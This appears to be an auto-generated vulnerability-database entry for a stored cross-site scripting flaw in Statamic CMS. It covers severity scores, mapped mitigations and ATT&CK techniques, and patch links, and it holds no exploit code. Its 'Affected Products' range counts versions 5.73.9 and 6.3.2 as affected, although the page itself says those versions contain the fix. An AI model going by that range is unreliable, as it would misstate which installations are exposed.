CVE-2026-27196

High

Published: 21 February 2026

Published

21 February 2026

Modified

30 March 2026

KEV Added

—

Patch

—

CVSS Score 8.1 CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N

EPSS Score 0.0001 2.7th percentile

Risk Priority 16 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2026-27196 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Statamic Statamic. Its CVSS base score is 8.1 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Browser Session Hijacking (T1185); ranked at the 2.7th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).

Threat & Defense at a Glance

What attackers do: exploitation maps to Browser Session Hijacking (T1185) and 2 other techniques. What defenders deploy: see the NIST 800-53 controls recommended below.

Threat & Defense Details

Mitigating Controls (NIST 800-53 r5)AI

SI-10 Information Input Validation good match

prevent

Requires validation of inputs to html fieldtypes to detect and reject or sanitize malicious JavaScript payloads before storage.

SI-15 Information Output Filtering good match

prevent

Mandates filtering or encoding of output from html fields to prevent execution of stored malicious scripts in viewers' browsers.

SI-2 Flaw Remediation good match

prevent

Ensures timely remediation of the stored XSS flaw by applying vendor patches such as 6.3.2 or 5.73.9.

MITRE ATT&CK Enterprise TechniquesAI

T1185 Browser Session Hijacking Collection

Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.

attack.mitre.org →

T1539 Steal Web Session Cookie Credential Access

An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials.

attack.mitre.org →

T1550.004 Web Session Cookie Lateral Movement

Adversaries can use stolen session cookies to authenticate to web applications and services.

attack.mitre.org →

Why these techniques?

Stored XSS enables direct injection of JS into admin-viewed content, facilitating browser session hijacking (T1185), theft of web session cookies (T1539), and subsequent use of those cookies for alternate authentication (T1550.004).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

NVD Description

Statmatic is a Laravel and Git powered content management system (CMS). Versions 5.73.8 and below in addition to 6.0.0-alpha.1 through 6.3.1 have a Stored XSS vulnerability in html fieldtypes which allows authenticated users with field management permissions to inject malicious…

JavaScript that executes when viewed by higher-privileged users. This issue has been fixed in 6.3.2 and 5.73.9.

Deeper analysisAI

CVE-2026-27196 is a Stored Cross-Site Scripting (XSS) vulnerability (CWE-79) in the html fieldtypes of Statamic, a Laravel and Git-powered content management system (CMS). It affects versions 5.73.8 and below, as well as 6.0.0-alpha.1 through 6.3.1. The vulnerability, published on 2026-02-21, carries a CVSS v3.1 base score of 8.1 (AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N).

Authenticated users with field management permissions can exploit this by injecting malicious JavaScript into html fields. The payload is stored and executes in the browser of higher-privileged users who view the affected content, enabling potential theft of sensitive data or unauthorized actions in the victim's session context due to the changed scope.

The issue has been fixed in Statamic versions 6.3.2 and 5.73.9. Mitigation involves updating to these releases, as detailed in the GitHub security advisory at https://github.com/statamic/cms/security/advisories/GHSA-8r7r-f4gm-wcpq and the patching commits https://github.com/statamic/cms/commit/11ae40e62edd3da044d37ebf264757a09cc2347b and https://github.com/statamic/cms/commit/6c270dacc2be02bfc2eee500766f3309f59d47b3.

Details

CWE(s): CWE-79

Affected Products

statamic

≤ 5.73.9 · 6.0.0 — 6.3.2

CVEs Like This One

CVE-2026-28426Same product: Statamic Statamic

CVE-2026-33172Same product: Statamic Statamic

CVE-2026-25759Same product: Statamic Statamic

CVE-2026-27939Same product: Statamic Statamic

CVE-2026-28425Same product: Statamic Statamic

CVE-2026-27593Same product: Statamic Statamic

CVE-2026-28423Same product: Statamic Statamic

CVE-2026-41175Same product: Statamic Statamic

CVE-2026-24836Shared CWE-79

CVE-2026-28754Shared CWE-79

References

https://github.com/statamic/cms/commit/11ae40e62edd3da044d37ebf264757a09cc2347b
Patch · security-advisories@github.com
https://github.com/statamic/cms/commit/6c270dacc2be02bfc2eee500766f3309f59d47b3
Patch · security-advisories@github.com
https://github.com/statamic/cms/security/advisories/GHSA-8r7r-f4gm-wcpq
Vendor Advisory · security-advisories@github.com